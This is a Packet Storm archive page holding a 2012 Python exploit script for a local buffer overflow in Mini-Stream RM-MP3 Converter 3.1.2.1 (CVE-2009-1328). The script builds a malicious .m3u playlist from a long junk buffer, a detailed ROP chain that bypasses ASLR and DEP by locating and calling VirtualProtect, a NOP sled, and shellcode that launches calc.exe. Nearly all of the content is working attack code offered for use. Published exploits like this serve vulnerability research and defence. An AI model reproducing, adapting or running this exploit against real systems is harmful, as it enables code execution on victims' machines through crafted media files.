exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mini-Stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow

Mini-Stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow
Posted Jul 26, 2012
Authored by Gianni Gnesa

Mini-Stream RM-MP3 Converter version 3.1.2.1.2010.03.30 buffer overflow exploit with ASLR and DEP bypass.

tags | exploit, overflow
advisories | CVE-2009-1328
SHA-256 | edfd394763830724256e7884bbcdffd800bc4481aa275a07d6e9009bb6093555

Mini-Stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow

Change Mirror Download
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 local buffer overflow (\w ASLR and DEP bypass)
# Date: 26 July 2012
# Exploit Author: Gianni Gnesa
# Vendor Homepage: http://mini-stream.net/
# Software Link: http://mini-stream.net/rm-to-mp3-converter/download
# Version: 3.1.2.1.2010.03.30
# Tested on: Windows 7 SP1 (VMware)
# References: CVE-2009-1328, BID 34494

from struct import pack

fname = "rop.m3u"
hdr = "http://."
junk1 = "A" * 17416 # junk

rop = [
0x10041720, # RETN [MSRMfilter03.dll]
0x41414141, # Compensate


#### Save ESP into ESI
# EAX=EBP
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
0x10051ff5, # ADD EAX,EBP / RETN [MSRMfilter03.dll]

# ESI=EAX
0x1005bb8e, # PUSH EAX / ADD DWORD PTR SS:[EBP+5],ESI / PUSH 1 / POP EAX / POP ESI / RETN [MSRMfilter03.dll]

# EBX=ESI
0x1001217b, # PUSH ESI / ADD AL,5E / POP EBX / RETN [MSRMfilter03.dll]

# EDX=EBX
0x1002991c, # XOR EDX,EDX / RETN [MSRMfilter03.dll]
0x10029f3e, # ADD EDX,EBX / POP EBX / RETN 10 [MSRMfilter03.dll]
0x41414141, # Junk popped in EBX

# ESI=ESP
0x10032D54, # PUSH ESP / AND AL,10 / POP ESI / MOV DWORD PTR DS:[EDX],ECX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for RETN
0x41414141, # Junk for RETN
0x41414141, # Junk for RETN
0x41414141, # Junk for RETN


#### Jump over VirtualProtect()
0x100237C8, # ADD ESP, 20 / RETN [MSRMfilter03.dll]

0x58585858, # VirtualProtect()
0x58585858, # Return Address
0x58585858, # lpAddress
0x58585858, # dwSize
0x58585858, # flNewProtect
0x10085515, # lpflOldProtect [Address in MSRMfilter03.dll]

0x90909090, # Padding
0x90909090, # Padding
# ADD ESP,20 / RETN will land here


#### Find kernel32.VirtualProtect
# Save ESI (Saved ESP) into EBX
0x1001217b, # PUSH ESI / ADD AL,5E / POP EBX / RETN [MSRMfilter03.dll]

# EAX = Saved ESP - 0xACE4
0x1002ca2d, # POP EAX / RETN [MSRMfilter03.dll]
0xFFFF531C, # -0xACE4 (offset from the Saved ESP to the kernel32.XXXXBBE4 in the stack)
0x10033bbb, # ADD EAX,ESI / POP ESI / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in ESI

# Pickup kernel32.XXXXBBE4 into EAX
0x10027f59, # MOV EAX,DWORD PTR DS:[EAX] / RETN [MSRMfilter03.dll]

# Find kernel32.VirtualProtect
0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]
0xFFFF675D, # -0x98A3 (offset from kernel32.XXXXBBE4 to kernel32.VirtualProtect)
0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]


##### Write VirtualProtect address to memory
# EDX = EBX = Saved ESP
0x1002993c, # XOR EDX,EDX / RETN [MSRMfilter03.dll]
0x10029f3e, # ADD EDX,EBX / POP EBX / RETN 10 [MSRMfilter03.dll]
0x41414141, # Junk popped in EBX

# EDX = EDX + 4
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for RETN
0x41414141, # Junk for RETN
0x41414141, # Junk for RETN
0x41414141, # Junk for RETN
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX

# Write VirtualProtect address to memory
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]


#### Write return address to memory
# EAX = EDX (Saved ESP) + 0x300
0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP

# EDX = EDX + 4
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX

# Write return address to memory
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]


#### Write lpAddress parameter to memory
# EAX = EDX (Saved ESP) + 0x300
0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]
0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]
0xFFFFFFFC, # -0x4 (compensate EDX increment)
0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP

# EDX = EDX + 4
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX

# Write lpAddress parameter to memory
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]


#### Write dwSize parameter to memory
# EAX = 0x400
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP
0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP

# EDX = EDX + 4
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX

# Write dwSize parameter to memory
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]


#### Write flNewProtect parameter to memory
# EAX = 0x40
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
0x10031c81, # ADD EAX,40 # POP EBP / RETN [MSRMfilter03.dll]
0x41414141, # Junk popped in EBP

# EDX = EDX + 4
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX
0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
0x41414141, # Junk for ESI
0x41414141, # Junk for EDI
0x41414141, # Junk for EBX

# Write flNewProtect parameter to memory
0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]


#### Call VirtualProtect
0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]
0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]
0xFFFFFFF0, # -0x10 (Move EDX back to the VirtualProtect call)
0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]
0x1002fe81, # XCHG EAX,ESP / RETN [MSRMfilter03.dll]
]

nops = "\x90" * 240

# calc.exe payload
shellcode = (
"\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52"
"\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E"
"\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C"
"\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F"
"\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7"
)


print "Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30"
print "Local buffer overflow (\w ASLR and DEP bypass)\n"

payload = hdr + junk1 + pack('<'+str(len(rop))+'L',*rop) + nops + shellcode

f = open(fname, "w")
f.write(payload)
f.close()

print "%s file created!" % fname

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close